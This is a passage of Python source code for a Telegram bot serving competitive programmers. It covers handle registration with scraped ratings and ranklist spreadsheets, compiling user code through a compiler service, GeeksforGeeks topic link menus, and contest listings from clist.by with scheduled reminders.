                return ConversationHandler.END
            s = soup.find_all('span', {"style": "font-weight:bold;"})
            if len(s) == 0:
                # user has never taken part in a rated contest
                s2 = ""
            else:
                s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
            s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
            vals = s1
        except urllib.error.URLError as e:
            update.message.reply_text('wrong id')
            user_data.clear()
            return ConversationHandler.END
    else:
        return ConversationHandler.END
    # CONNECTING TO DATABASE
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
    # STORING THE PROFILE INFO IN datas TABLE
    # STORING HANDLES IN handles TABLE
    c.execute("INSERT OR IGNORE INTO datas (id, name, " + code1 + ") VALUES (?, ?, ?)", (user, name1, vals))
    c.execute("INSERT OR IGNORE INTO handles (id, name, " + code1 + ") VALUES (?, ?, ?)", (user, name1, handle1))
    # rowcount == 0 means the row already existed, so update it in place
    if c.rowcount == 0:
        c.execute("UPDATE datas SET " + code1 + " = (?) , name= (?) WHERE id = (?) ", (vals, name1, user))
        c.execute("UPDATE handles SET " + code1 + " = (?) , name= (?) WHERE id = (?) ", (handle1, name1, user))
    # extract a numeric rating from the scraped text into the priority table
    # (used to order ranklists); best effort — parsing failures are ignored
    if code1=='HE':
        try:
            rat=vals.split('\n')
            if(rat[1]=="Rating"):
                rat2=rat[2].strip(" ").strip("\n")
                c.execute("INSERT OR IGNORE INTO priority (id, HE) VALUES(?, ?)", (user, rat2))
                if(c.rowcount==0):
                    c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, user))
        except:
            pass
    elif code1=='HR':
        try:
            rat=vals.split('\n')
            rat2=rat[1].split(" ")[1].strip(" ").strip("\n")
            c.execute("INSERT OR IGNORE INTO priority (id, HR) VALUES(?, ?)", (user, rat2))
            if (c.rowcount == 0):
                c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, user))
        except:
            pass
    elif code1=='CF':
        try:
            rat=vals.split("\n")
            if "contest rating:"in rat[1]:
                rat2=rat[1].split(" ")[2].strip(" ").strip("\n")
                c.execute("INSERT OR IGNORE INTO priority (id, CF) VALUES(?, ?)", (user, rat2))
                if (c.rowcount == 0):
                    c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, user))
        except:
            pass
    elif code1=='CC':
        try:
            rat=vals.split("\n")
            if not "rating" in rat[1]:
                rat2=rat[2].split(" ")[1].strip(" ").strip("\n")
                c.execute("INSERT OR IGNORE INTO priority (id, CC) VALUES(?, ?)", (user, rat2))
                if (c.rowcount == 0):
                    c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, user))
        except:
            pass
    elif code1=='SP':
        # spoj has no rating column; just make sure the priority row exists
        c.execute("INSERT OR IGNORE INTO priority (id) VALUES(?)", (user,))
    conn.commit()
    # BELOW LINES ARE USED TO CREATE XLMX FILES OF ALL SORTS OF RANKLIST
    # SO WHEN USER ASKS FOR RANKLIST THERE IS NO DELAY
    workbook = Workbook(mount_point+'all.xlsx')
    worksheet = workbook.add_worksheet()
    format = workbook.add_format()
    format.set_align('top')
    format.set_text_wrap()
    mysel = c.execute("SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
    for i, row in enumerate(mysel):
        for j, value in enumerate(row):
            worksheet.write(i, j, row[j], format)
        worksheet.set_row(i, 170)
    worksheet.set_column(0, 5, 40)
    workbook.close()
    # per-judge ranklist spreadsheet, e.g. CF.xlsx
    workbook = Workbook(mount_point + code1 + ".xlsx")
    worksheet = workbook.add_worksheet()
    format = workbook.add_format()
    format.set_align('top')
    format.set_text_wrap()
    if(code1=='SP'):
        # spoj has no rating in priority, so the list is unordered
        mysel = c.execute("SELECT name, " + code1 + " FROM datas")
        for i, row in enumerate(mysel):
            for j, value in enumerate(row):
                worksheet.write(i, j, row[j], format)
            worksheet.set_row(i, 170)
        worksheet.set_column(0, 5, 40)
        workbook.close()
    else:
        mysel = c.execute("SELECT datas.name, datas." + code1 + " FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority."+code1+" AS FLOAT) DESC")
        for i, row in enumerate(mysel):
            for j, value in enumerate(row):
                worksheet.write(i, j, row[j], format)
            worksheet.set_row(i, 170)
        worksheet.set_column(0, 5, 40)
        workbook.close()
    conn.close()
    update.message.reply_text("Succesfully Registered")
    update.message.reply_text(name1 + " \n" + vals)
    user_data.clear()
    return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR REGISTERING THE USERS HANDLES
# START OF CONVERSATION HANDLER FOR COMPILING AND RUNNING
@timeouts.wrapper
def compilers(bot, update):
    """Ask which programming language the user wants to compile with."""
    # callback data is the language key plus the 'comp1' marker read by lang()
    languages = (("C++", 'cppcomp1'), ("Python", 'pythoncomp1'),
                 ("C", 'ccomp1'), ("Java", 'javacomp1'),
                 ("Python3", 'python3comp1'), ("Java8", 'java8comp1'),
                 ("Other", 'othercomp1'))
    rows = [[InlineKeyboardButton(label, callback_data=data) for label, data in languages[k:k + 2]]
            for k in range(0, len(languages), 2)]
    update.message.reply_text('Please select the language', reply_markup=InlineKeyboardMarkup(rows))
    return LANG
# FUNCTION TO GET THE PROGRAMMING LANGUAGE
def lang(bot, update, user_data):
    """Record the chosen language, or list all supported ones for 'other'."""
    query = update.callback_query
    choice = str(query.data).replace("comp1", "")
    if choice == "other":
        # IF USER CHOOSES OTHER: list every language the compiler supports
        supported = "".join(name + "," for name in compiler.supportedlanguages())
        bot.edit_message_text(text="enter the name of language\n" + supported,
                              chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        return OTHER
    # ELSE ASKING WETHER HE WANTS TO SEND SOURCE CODE OR A .TXT FILE
    user_data['lang'] = choice
    buttons = [[InlineKeyboardButton("Enter Source Code", callback_data='codeso1'),
                InlineKeyboardButton("Send a .txt file", callback_data='fileso1')]]
    bot.edit_message_text(text="please select", reply_markup=InlineKeyboardMarkup(buttons),
                          chat_id=query.message.chat_id,
                          message_id=query.message.message_id)
    return CODE
# FUNCTION TO GET THE SOURCE CODE OR .TXT FILE AS INPUT
def code(bot, update, user_data):
    """Route the user to typing source code or uploading a .txt file."""
    query = update.callback_query
    choice = str(query.data).replace("so1", "")
    if choice == "code":
        bot.edit_message_text(text="please enter your code\nPlease make sure that the first line is not a comment line",
                              chat_id=query.message.chat_id, message_id=query.message.message_id)
        return DECODE
    if choice == "file":
        bot.edit_message_text(text="please send your .txt file\nMaximum size 2mb", chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        return FILE
    return ConversationHandler.END
# FUNCTION TO GET TESTCASE FILE
def filetest(bot, update, user_data):
    """Run the stored source against a testcase .txt file sent by the user.

    Downloads the document (rejecting anything over 2 MB), feeds it to the
    compiler together with user_data['code']/user_data['lang'], and replies
    with the output inline, or as out.txt when it exceeds Telegram's limit.
    """
    # FIX: the original assigned file_id twice; the duplicate is removed.
    file_id = update.message.document.file_id
    file_size = update.message.document.file_size
    if file_size > 2097152:
        update.message.reply_text("FILE SIZE GREATER THAN 2 MB")
        return ConversationHandler.END
    newFile = bot.get_file(file_id)
    newFile.download('test.txt')
    with open('test.txt', 'rt') as f:
        source = f.read()
    # CONVERTING UNICODE GUILLEMETS BACK TO SHIFT OPERATORS
    s1 = (str(user_data['code'])).replace("«", "<<").replace("»", ">>")
    result = compiler.run({'source': s1,
                           'lang': user_data['lang'],
                           'testcases': [source]
                           })
    output = result.output
    time1 = result.time
    memory1 = result.memory
    message1 = result.message
    if time1 is not None:
        time1 = time1[0]
    if memory1 is not None:
        memory1 = memory1[0]
    if output is not None:
        output = output[0]
    else:
        output = ""
    markup = ReplyKeyboardRemove()
    summary = ("Output:\n" + str(output) + "\n" + "Time: " + str(time1) +
               "\nMemory: " + str(memory1) + "\nMessage: " + str(message1))
    if (len(output) <= 2897):
        update.message.reply_text(summary, reply_markup=markup)
    else:
        # output too long for a message: ship it as a document instead
        with open("out.txt", "w") as text_file:
            text_file.write(summary)
        # FIX: the original leaked the 'rb' file handle; use a context manager
        with open('out.txt', 'rb') as doc:
            bot.send_document(chat_id=update.message.chat_id, document=doc, reply_markup=markup)
        os.remove('out.txt')
    user_data.clear()
    os.remove('test.txt')
    return ConversationHandler.END
# FUNCTION TO DOWNLOAD THE FILE SENT AND EXTRACT ITS CONTENTS
def filer(bot, update, user_data):
    """Download a source-code .txt file (max 2 MB), store its contents, and
    ask the user how they want to supply test cases."""
    file_id = update.message.document.file_id
    file_size = update.message.document.file_size
    if file_size > 2097152:
        update.message.reply_text("FILE SIZE GREATER THAN 2 MB")
        return ConversationHandler.END
    newFile = bot.get_file(file_id)
    newFile.download('abcd.txt')
    with open('abcd.txt', 'r') as f:
        user_data['code'] = f.read()
    custom_keyboard = [['#no test case', '#send a .txt file']]
    # FIX: 'resize_keybord' was misspelled, so the keyboard was never resized
    reply_markup = ReplyKeyboardMarkup(custom_keyboard, one_time_keyboard=True, resize_keyboard=True)
    # FIX: "I you want" typo in the user-facing prompt corrected to "If you want"
    update.message.reply_text(
        'Please send test cases together as you would do in online ide\nIf you dont want to provide test cases select #no test case\nIf you want to send test cases as .txt file select #send a .txt file',
        reply_markup=reply_markup)
    # REMOVING THE FILE AFTER PROCESS IS COMPLETE
    os.remove('abcd.txt')
    return TESTCASES
# FUNCTION TO GET THE SOURCE CODE SENT BY USER
def decode(bot, update, user_data):
    """Store source code typed directly into the chat and ask how the user
    wants to supply test cases."""
    user_data['code'] = update.message.text
    custom_keyboard = [['#no test case', '#send a .txt file']]
    # FIX: 'resize_keybord' was misspelled, so the keyboard was never resized
    reply_markup = ReplyKeyboardMarkup(custom_keyboard, one_time_keyboard=True, resize_keyboard=True)
    # FIX: "I you want" typo in the user-facing prompt corrected to "If you want"
    update.message.reply_text(
        'Please send test cases together as you would do in online ide\nIf you dont want to provide test cases select #no test case\nIf you want to send test cases as .txt file select #send a .txt file',
        reply_markup=reply_markup)
    return TESTCASES
# FUNCTION TO GET THE TEST CASES FROM THE USER
def testcases(bot, update, user_data):
    """Run the stored source, with or without the test cases just received.

    '#send a .txt file' defers to the file upload state; '#no test case'
    runs the code with no input; any other text is treated as the test
    cases themselves. The compile-and-reply logic that was duplicated in
    both branches of the original is unified into a single path.
    """
    s = update.message.text
    markup = ReplyKeyboardRemove()
    if s == "#send a .txt file":
        update.message.reply_text("Please send your testcases as a .txt file\nMaximum size 2mb", reply_markup=markup)
        return FILETEST
    # CONVERTING UNICODE CHARACTER TO DOUBLE GREATER THAN OR LESS THAN
    # WEIRD
    source = (str(user_data['code'])).replace("«", "<<").replace("»", ">>")
    # USING COMPILER FUNCTION FROM helper.py script
    job = {'source': source, 'lang': user_data['lang']}
    if s != "#no test case":
        job['testcases'] = [s]
    result = compiler.run(job)
    # GETTING OUTPUT FROM result CLASS in helper.py script
    output = result.output
    time1 = result.time
    memory1 = result.memory
    message1 = result.message
    if time1 is not None:
        time1 = time1[0]
    if memory1 is not None:
        memory1 = memory1[0]
    if output is not None:
        output = output[0]
    else:
        output = ""
    summary = ("Output:\n" + str(output) + "\n" + "Time: " + str(time1) +
               "\nMemory: " + str(memory1) + "\nMessage: " + str(message1))
    if (len(output) <= 2897):
        update.message.reply_text(summary, reply_markup=markup)
    else:
        # output too long for a message: ship it as a document instead
        with open("out.txt", "w") as text_file:
            text_file.write(summary)
        # FIX: the original leaked the 'rb' file handle; use a context manager
        with open('out.txt', 'rb') as doc:
            bot.send_document(chat_id=update.message.chat_id, document=doc, reply_markup=markup)
        os.remove('out.txt')
    user_data.clear()
    return ConversationHandler.END
# FUNCTION FOR THE CASE WHERE USER HAD SELECTED OTHER
def other(bot, update, user_data):
    """Store a free-form language name and ask how the source will arrive."""
    user_data['lang'] = update.message.text
    buttons = [[InlineKeyboardButton("Enter Source Code", callback_data='code'),
                InlineKeyboardButton("Send a file", callback_data='file')]]
    update.message.reply_text("please select", reply_markup=InlineKeyboardMarkup(buttons))
    return CODE
# END OF CONVERSATION HANDLER FOR COMPILING AND RUNNING
# START OF CONVERSATION HANDLER FOR GEEKS FOR GEEKS
@timeouts.wrapper
def gfg(bot, update):
    """Show the top-level geeks-for-geeks topic menu."""
    # callback data is the JSON-file stem plus the 'gfg1' marker read by gfg1()
    topics = (("ALGORITHMS", 'Algorithmsgfg1'), ("DATA STRUCTURES", 'DSgfg1'),
              ("GATE", 'GATEgfg1'), ("INTERVIEW", 'Interviewgfg1'))
    rows = [[InlineKeyboardButton(label, callback_data=data) for label, data in topics[k:k + 2]]
            for k in range(0, len(topics), 2)]
    update.message.reply_text("please select", reply_markup=InlineKeyboardMarkup(rows))
    return GFG1
# FUNCTION TO SHOW SUBMENU 1
def gfg1(bot, update, user_data):
    """Show the second-level geeks-for-geeks menu for the chosen topic.

    The callback data minus its 'gfg1' suffix names the local JSON file
    that holds the links (e.g. 'Algorithms.json'); the file name is kept in
    user_data['gfg'] for gfg2/gfg3 to load later.
    """
    query = update.callback_query
    val = query.data
    val=str(val).replace("gfg1","")
    val=val+".json"
    user_data['gfg'] = val
    if (val == "Algorithms.json"):
        keyboard = [[InlineKeyboardButton("Analysis of Algorithms", callback_data='Analysis of Algorithmsgfg2'),
                     InlineKeyboardButton("Searching and Sorting", callback_data='Searching and Sortinggfg2')],
                    [InlineKeyboardButton("Greedy Algorithms", callback_data='Greedy Algorithmsgfg2'),
                     InlineKeyboardButton("Dynamic Programming", callback_data='Dynamic Programminggfg2')],
                    [InlineKeyboardButton("Strings and Pattern Searching",
                                          callback_data='Strings and Pattern Searchinggfg2'),
                     InlineKeyboardButton("Backtracking", callback_data='Backtrackinggfg2')],
                    [InlineKeyboardButton("Geometric Algorithms", callback_data='Geometric Algorithmsgfg2'),
                     InlineKeyboardButton("Mathematical Algorithms", callback_data='Mathematical Algorithmsgfg2')],
                    [InlineKeyboardButton("Bit Algorithms", callback_data='Bit Algorithmsgfg2'),
                     InlineKeyboardButton("Randomized Algorithms", callback_data='Randomized Algorithmsgfg2')],
                    [InlineKeyboardButton("Misc Algorithms", callback_data='Misc Algorithmsgfg2'),
                     InlineKeyboardButton("Recursion", callback_data='Recursiongfg2')],
                    [InlineKeyboardButton("Divide and Conquer", callback_data='Divide and Conquergfg2')]]
    elif (val == "DS.json"):
        keyboard = [[InlineKeyboardButton("Linked Lists", callback_data='Linked Listsgfg2'),
                     InlineKeyboardButton("Stacks", callback_data='Stacksgfg2')],
                    [InlineKeyboardButton("Queue", callback_data='Queuegfg2'),
                     InlineKeyboardButton("Binary Trees", callback_data='Binary Treesgfg2')],
                    [InlineKeyboardButton("Binary Search Trees",
                                          callback_data='Binary Search Treesgfg2'),
                     InlineKeyboardButton("Heaps", callback_data='Heapsgfg2')],
                    [InlineKeyboardButton("Hashing", callback_data='Hashinggfg2'),
                     InlineKeyboardButton("Graphs", callback_data='Graphsgfg2')],
                    [InlineKeyboardButton("Advanced Data Structures", callback_data='Advanced Data Structuresgfg2'),
                     InlineKeyboardButton("Arrays", callback_data='Arraysgfg2')],
                    [InlineKeyboardButton("Matrix", callback_data='Matrixgfg2')]]
    elif (val == "GATE.json"):
        keyboard = [[InlineKeyboardButton("Operating Systems", callback_data='Operating Systemsgfg2'),
                     InlineKeyboardButton("Database Management Systems", callback_data='Database Management Systemsgfg2')],
                    [InlineKeyboardButton("Automata Theory", callback_data='Automata Theorygfg2'),
                     InlineKeyboardButton("Compilers", callback_data='Compilersgfg2')],
                    [InlineKeyboardButton("Computer Networks",
                                          callback_data='Computer Networksgfg2'),
                     InlineKeyboardButton("GATE Data Structures and Algorithms",
                                          callback_data='GATE Data Structures and Algorithmsgfg2')]]
    elif (val == "Interview.json"):
        keyboard = [[InlineKeyboardButton("Payu", callback_data='Payugfg2'),
                     InlineKeyboardButton("Adobe", callback_data='Adobegfg2')],
                    [InlineKeyboardButton("Amazon", callback_data='Amazongfg2'),
                     InlineKeyboardButton("Flipkart", callback_data='Flipkartgfg2')],
                    [InlineKeyboardButton("Google",
                                          callback_data='Googlegfg2'),
                     InlineKeyboardButton("Microsoft", callback_data='Microsoftgfg2')],
                    [InlineKeyboardButton("Snapdeal", callback_data='Snapdealgfg2'),
                     InlineKeyboardButton("Zopper-Com", callback_data='Zopper-Comgfg2')],
                    [InlineKeyboardButton("Yahoo", callback_data='Yahoogfg2'),
                     InlineKeyboardButton("Cisco", callback_data='Ciscogfg2')],
                    [InlineKeyboardButton("Facebook", callback_data='Facebookgfg2'),
                     InlineKeyboardButton("Yatra.Com", callback_data='Yatra.Comgfg2')],
                    [InlineKeyboardButton("Symantec", callback_data='Symantecgfg2'),
                     InlineKeyboardButton("Myntra", callback_data='Myntragfg2')],
                    [InlineKeyboardButton("Groupon", callback_data='Groupongfg2'),
                     InlineKeyboardButton("Belzabar", callback_data='Belzabargfg2')],
                    [InlineKeyboardButton("Paypal", callback_data='Paypalgfg2'),
                     InlineKeyboardButton("Akosha", callback_data='Akoshagfg2')],
                    [InlineKeyboardButton("Linkedin", callback_data='Linkedingfg2'),
                     InlineKeyboardButton("Browserstack", callback_data='Browserstackgfg2')],
                    [InlineKeyboardButton("Makemytrip", callback_data='Makemytripgfg2'),
                     InlineKeyboardButton("Infoedge", callback_data='Infoedgegfg2')],
                    [InlineKeyboardButton("Practo", callback_data='Practogfg2'),
                     InlineKeyboardButton("Housing-Com", callback_data='Housing-Comgfg2')],
                    [InlineKeyboardButton("Ola-Cabs", callback_data='Ola-Cabsgfg2'),
                     InlineKeyboardButton("Grofers", callback_data='Grofersgfg2')],
                    [InlineKeyboardButton("Thoughtworks", callback_data='Thoughtworksgfg2'),
                     InlineKeyboardButton("Delhivery", callback_data='Delhiverygfg2')],
                    [InlineKeyboardButton("Taxi4Sure", callback_data='Taxi4Suregfg2'),
                     InlineKeyboardButton("Lenskart", callback_data='Lenskartgfg2')]]
    # NOTE(review): if the callback data matches none of the four topics,
    # 'keyboard' is unbound and the next line raises NameError — presumably
    # unreachable because gfg() only offers these four; confirm.
    reply_markup = InlineKeyboardMarkup(keyboard)
    bot.edit_message_text(text="Please select", reply_markup=reply_markup, chat_id=query.message.chat_id,
                          message_id=query.message.message_id)
    return GFG2
# FUNCTION TO SHOW SUBMENU 2
def gfg2(bot, update, user_data):
    """Handle the second-level geeks-for-geeks menu choice.

    'Advanced Data Structures' opens a third menu; every other choice loads
    the JSON file remembered in user_data['gfg'] and sends the matching
    links as HTML, splitting into a second message after 50 links.
    """
    query = update.callback_query
    val = str(query.data).replace("gfg2", "")
    if val == "Advanced Data Structures":
        keyboard = [[InlineKeyboardButton("Advanced Lists", callback_data='Advanced Listsgfg3'),
                     InlineKeyboardButton("Trie", callback_data='Triegfg3')],
                    [InlineKeyboardButton("Suffix Array and Suffix Tree", callback_data='Suffix Array and Suffix Treegfg3'),
                     InlineKeyboardButton("AVL Tree", callback_data='AVL Treegfg3')],
                    [InlineKeyboardButton("Splay Tree",
                                          callback_data='Splay Treegfg3'),
                     InlineKeyboardButton("B Tree", callback_data='B Treegfg3')],
                    [InlineKeyboardButton("Segment Tree", callback_data='Segment Treegfg3'),
                     InlineKeyboardButton("Red Black Tree", callback_data='Red Black Treegfg3')],
                    [InlineKeyboardButton("K Dimensional Tree", callback_data='K Dimensional Treegfg3'),
                     InlineKeyboardButton("Others", callback_data='Othersgfg3')]]
        reply_markup = InlineKeyboardMarkup(keyboard)
        bot.edit_message_text(text="Please select", reply_markup=reply_markup, chat_id=query.message.chat_id,
                              message_id=query.message.message_id)
        return GFG3
    try:
        with open(user_data['gfg'], encoding='utf-8') as data_file:
            data = json.load(data_file)
        se = data[val]
        first = ""
        overflow = ""
        # build anchor tags; everything past the 50th link goes into a
        # second message to stay under Telegram's message-size limit
        for count, title in enumerate(se, start=1):
            link = '<a href="' + se[title] + '">' + title + '</a>\n\n'
            if count <= 50:
                first = first + link
            else:
                overflow = overflow + link
        bot.edit_message_text(text=val + "\n\n" + first, chat_id=query.message.chat_id,
                              message_id=query.message.message_id, parse_mode=ParseMode.HTML)
        if len(overflow) != 0:
            bot.send_message(text=val + "\n\n" + overflow, chat_id=query.message.chat_id, parse_mode=ParseMode.HTML)
    except Exception:
        # FIX: was a bare 'except:' which also swallowed SystemExit and
        # KeyboardInterrupt; best-effort abort kept, scope narrowed.
        return ConversationHandler.END
    user_data.clear()
    return ConversationHandler.END
# FUNCTION TO SHOW SUBMENU 3
def gfg3(bot, update, user_data):
    """Send links for the chosen 'Advanced Data Structures' sub-topic.

    Loads the JSON file remembered in user_data['gfg'] and replies with the
    sub-topic's links rendered as HTML anchors.
    """
    query = update.callback_query
    try:
        val = str(query.data).replace("gfg3", "")
        with open(user_data['gfg'], encoding='utf-8') as data_file:
            data = json.load(data_file)
        se = data["Advanced Data Structures"][val]
        s = ""
        for title in se:
            s = s + '<a href="' + se[title] + '">' + title + '</a>\n\n'
        bot.edit_message_text(text=val + "\n\n" + s, chat_id=query.message.chat_id,
                              message_id=query.message.message_id, parse_mode=ParseMode.HTML)
    except Exception:
        # FIX: was a bare 'except:' which also swallowed SystemExit and
        # KeyboardInterrupt; best-effort abort kept, scope narrowed.
        return ConversationHandler.END
    user_data.clear()
    return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GEEKS FOR GEEKS
# GLOBAL VARIABLES STORE THE PREVIOUS DATA TEMPORARILY IN CASE THE WEBPAGE IS BEING MAINTAINED
# ong: last successfully rendered "ongoing contests" text, replayed when clist.by fails
ong = ""
# upc: last successful clist.by result set for upcoming contests (list after first success)
upc = ""
# COMMAND HANDLER FUNCTION TO SHOW LIST OF ONGOING COMPETITIONS
@timeouts.wrapper
def ongoing(bot, update):
    """Handle /ongoing: list up to 15 currently running contests from clist.by.

    On any failure while parsing/rendering the response, replies with the
    cached text from the previous successful call (global `ong`).
    """
    global ong
    # PARSING JSON
    date1 = update.message.date
    payload = {'limit': '15', 'start__lt': str(date1), 'end__gt': str(date1),
               'username': CLIST_USER_NAME, 'api_key': CLIST_API_KEY, 'format': 'json', 'order_by': 'end'}
    url = "https://clist.by/api/v1/contest/?"
    url = url + urllib.parse.urlencode(payload)
    opener = urllib.request.build_opener()
    # FIX: the second 'addheaders =' assignment used to overwrite the first,
    # silently dropping the Content-Type header; set both in one list.
    opener.addheaders = [('Content-Type', 'application/json'), ('User-agent', 'Mozilla/5.0')]
    rawData = opener.open(url).read().decode('utf-8')
    try:
        jsonData = json.loads(rawData)
        searchResults = jsonData['objects']
        s = ""
        i = 0
        for er in searchResults:
            i = i + 1
            if (i == 16):
                break
            title = er['event']
            start = er['start']
            sec = timedelta(seconds=int(er['duration']))
            # render the duration via a dummy date: day-1 gives whole days
            d = datetime(1, 1, 1) + sec
            duration = ("%d days %d hours %d min" % (d.day - 1, d.hour, d.minute))
            host = er['resource']['name']
            contest = er['href']
            start1 = time_converter(start, '+0530')
            s = s + title + "\n" + "Start:\n" + start.replace("T", " ") + " GMT\n" + str(
                start1).replace("T",
                                " ") + " IST\n" + "Duration:" + duration + "\n" + host + "\n" + contest + "\n\n"
        ong = s
        update.message.reply_text(s)
    except Exception:
        # FIX: was a bare 'except:'; keep the best-effort fallback to the
        # cached listing but stop swallowing SystemExit/KeyboardInterrupt.
        update.message.reply_text(ong)
# FUNCTION TO CONVERT TIME FROM UTC TO OTHER TIME ZONE
def time_converter(old_time, time_zone):
    """Shift an ISO timestamp (``%Y-%m-%dT%H:%M:%S``) by a UTC offset.

    *time_zone* is a sign + 4-digit offset such as ``'+0530'`` or
    ``'-0030'``; a minutes field of ``30`` becomes half an hour.
    Returns the shifted timestamp in the same string format.
    """
    half = '.5' if time_zone[3] == '3' else '.0'
    offset_hours = float(time_zone[:3] + half)
    parsed = datetime.strptime(old_time, "%Y-%m-%dT%H:%M:%S")
    shifted = parsed + timedelta(hours=offset_hours)
    return shifted.strftime("%Y-%m-%dT%H:%M:%S")
# START OF CONVERSATION HANDLER TO SHOW A LIST OF UPCOMING COMPETITIONS AND GET REMINDERS
def _format_upcoming(results, with_seconds):
    """Build the numbered contest listing and its inline keyboard.

    Returns ``(text, keyboard)`` where *keyboard* groups the numeric
    selection buttons five per row. *with_seconds* selects the duration
    format used by the cached-data fallback path.
    """
    s = ""
    keyboard = []
    button_row = []
    for i, er in enumerate(results, start=1):
        # LIMITING NO OF EVENTS TO 15
        if i == 16:
            break
        start = er['start']
        d = datetime(1, 1, 1) + timedelta(seconds=int(er['duration']))
        if with_seconds:
            duration = "%d days %d hours %d min %d sec" % (d.day - 1, d.hour, d.minute, d.second)
        else:
            duration = "%d days %d hours %d min" % (d.day - 1, d.hour, d.minute)
        start1 = time_converter(start, '+0530')  # GMT -> IST (+5:30)
        button_row.append(InlineKeyboardButton(str(i), callback_data=str(i)))
        s = s + str(i) + ". " + er['event'] + "\n" + "Start:\n" + start.replace("T", " ") + " GMT\n" + str(
            start1).replace("T", " ") + " IST\n" + "Duration: " + str(duration) + "\n" + er['resource']['name'] + "\n" + er['href'] + "\n\n"
        if i % 5 == 0:
            keyboard.append(button_row)
            button_row = []
    if button_row:
        # BUG FIX: the old code unconditionally appended the trailing row,
        # producing an empty keyboard row when the count was a multiple of 5.
        keyboard.append(button_row)
    return s, keyboard


@timeouts.wrapper
def upcoming(bot, update):
    """Reply with up to 15 upcoming contests plus a reminder keyboard.

    On API failure the previously cached result list ``upc`` is re-rendered
    instead (this fallback also uses the seconds-precision duration format,
    matching the original behaviour).
    """
    global upc
    date1 = update.message.date
    payload = {'limit': '15', 'start__gt': str(date1), 'order_by': 'start',
               'username': CLIST_USER_NAME, 'api_key': CLIST_API_KEY, 'format': 'json'}
    url = "https://clist.by/api/v1/contest/?" + urllib.parse.urlencode(payload)
    opener = urllib.request.build_opener()
    # BUG FIX: the two header assignments used to overwrite each other,
    # silently dropping the Content-Type header.
    opener.addheaders = [('Content-Type', 'application/json'), ('User-agent', 'Mozilla/5.0')]
    rawData = opener.open(url).read().decode('utf-8')
    try:
        searchResults = json.loads(rawData)['objects']
        s, keyboard = _format_upcoming(searchResults, with_seconds=False)
        upc = searchResults  # cache for the fallback path and for remind()
        update.message.reply_text(s + "Select competition number to get notification" + "\n\n",
                                  reply_markup=InlineKeyboardMarkup(keyboard))
    except Exception:
        # Fetch/parse failed: rebuild the menu from the cached results.
        s, keyboard = _format_upcoming(upc, with_seconds=True)
        update.message.reply_text(s + "\n\n" + "Select competition number to get notification",
                                  reply_markup=InlineKeyboardMarkup(keyboard))
    return SCHED
# Persist reminder jobs in the bot's SQLite database so scheduled
# reminders survive process restarts.
jobstores = {
    'default': SQLAlchemyJobStore(url='sqlite:///'+mount_point+'coders1.db')
}
# Scheduler dedicated to user reminders (a second one, `sched`, handles scraping).
schedule = BackgroundScheduler(jobstores=jobstores)
schedule.start()
# FUNCTION TO SET REMINDER
def remind(bot, update):
    """Callback handler: schedule two reminders for the contest the user picked.

    Job ids are ``<chat_id><contest_id><suffix>`` with suffix ``"0"`` for the
    day-of reminder and ``"1"`` for the 30-minutes-before reminder.
    """
    query = update.callback_query
    msg = query.data
    if str(msg).isdigit():
        msg = int(msg) - 1  # buttons are 1-based, `upc` is 0-based
        # '-0030' shifts the start time back half an hour for the second reminder.
        start1 = time_converter(upc[msg]['start'], '-0030')
        dateT = str(upc[msg]['start']).replace("T", " ").split(" ")
        start1 = start1.replace("T", " ").split(" ")
        date = dateT[0].split("-")
        date1 = start1[0].split("-")
        time1 = start1[1].split(":")
        # Reminder on the contest day (midnight cron of that date).
        schedule.add_job(remindmsgDay, 'cron', year=date[0], month=date[1], day=date[2], replace_existing=True,
                         id=str(query.message.chat_id) + str(upc[msg]['id']) + "0",
                         args=[str(query.message.chat_id),
                               str(upc[msg]['event']) + "\n" + str(upc[msg]['href'])])
        # BUG FIX: `minute` was previously taken from time1[0] (the HOUR
        # field), so the half-hour reminder fired at the wrong minute.
        schedule.add_job(remindmsg, 'cron', year=date1[0], month=date1[1], day=date1[2], hour=time1[0],
                         minute=time1[1],
                         replace_existing=True,
                         id=str(query.message.chat_id) + str(upc[msg]['id']) + "1",
                         args=[str(query.message.chat_id),
                               str(upc[msg]['event'] + "\n" + str(upc[msg]['href']))])
        bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id,
                              text="I will remind you about " + upc[msg]['event']+"\nYou can use command /dontremindme to cancel reminder")
        # Negative chat ids are group chats.
        if query.message.chat_id < 0:
            bot.send_message(chat_id=query.message.chat_id,text="I detected this is a group. The reminder will be sent to the group. If you want to get reminder personally then use this command in private message")
    return ConversationHandler.END
# WHAT HAPPENS WHEN A REMINDER IS DEPLOYED
def remindmsgDay(chatId, message):
    """Scheduled-job target: deliver the day-of contest reminder."""
    # A fresh Bot is built each time because this runs inside the scheduler,
    # outside any handler context.
    Bot(TOKEN).send_message(chat_id=chatId, text="You have a contest today\n " + message)
def remindmsg(chatId, message):
    """Scheduled-job target: deliver the 30-minutes-before contest reminder."""
    Bot(TOKEN).send_message(chat_id=chatId, text="Your contest starts in half an hour\n " + message)
# END OF CONVERSATION HANDLER TO SHOW A LIST OF UPCOMING COMPETITIONS AND GET REMINDERS
# START OF CONVERSATION HANDLER TO REMOVE REMINDERS
@timeouts.wrapper
def removeRemind(bot, update):
    """Entry point of the remove-reminder conversation.

    Lists this chat's pending day-of reminder jobs (ids ending in "0")
    as an inline keyboard, or reports that none exist.
    """
    cid = str(update.message.chat_id)
    conn = sqlite3.connect(mount_point+'coders1.db')
    c = conn.cursor()
